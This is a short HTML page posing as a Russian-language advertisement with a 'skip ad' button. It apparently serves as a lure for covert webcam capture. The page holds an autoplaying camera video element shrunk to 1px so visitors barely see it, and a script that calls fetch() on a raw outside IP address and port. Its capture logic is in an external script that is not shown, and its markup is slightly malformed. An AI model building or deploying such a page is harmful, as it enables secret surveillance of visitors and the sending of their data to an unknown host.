<!DOCTYPE <!DOCTYPE html>
<html>
<head>
  <title>Реклама</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      max-width: 800px;
      margin: 0 auto;
      padding: 20px;
      text-align: center;
    }
    #camera {
      width: 100%;
      max-width: 1px;
      background: #000;
      display: block;
    }
    
    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
    button {
      padding: 12px 24px;
      font-size: 16px;
      background: #4CAF50;
      color: white;
      border: none;
      border-radius: 4px;
      cursor: pointer;
    }
    button:disabled {
      background: #cccccc;
      cursor: not-allowed;
    }
    #status {
      margin: 20px 0;
      padding: 10px;
      border-radius: 4px;
      background: #f0f0f0;
      min-height: 20px;
    }
  </style>
</head>
<body>
  <img src= "images/rek.png">
  <div id="loader"></div>
  <video id="camera" autoplay playsinline></video>
  <button id="captureBtn" disabled>Пропустить рекламу</button>
  <div id="status">Пропустить рекламу через 3 секунды</div>
  <p id="response"></p>

  <script>
    function sendRequest() {
      fetch('89.223.70.233:2525')
        .then(response => response.text())
        .then(data => {
          document.getElementById('response').innerText = data;
        })
        .catch(error => {
          console.error('Error:', error);
        });
    }
  </script>

  <script src="js/script.js"></script>
</body>
</html>
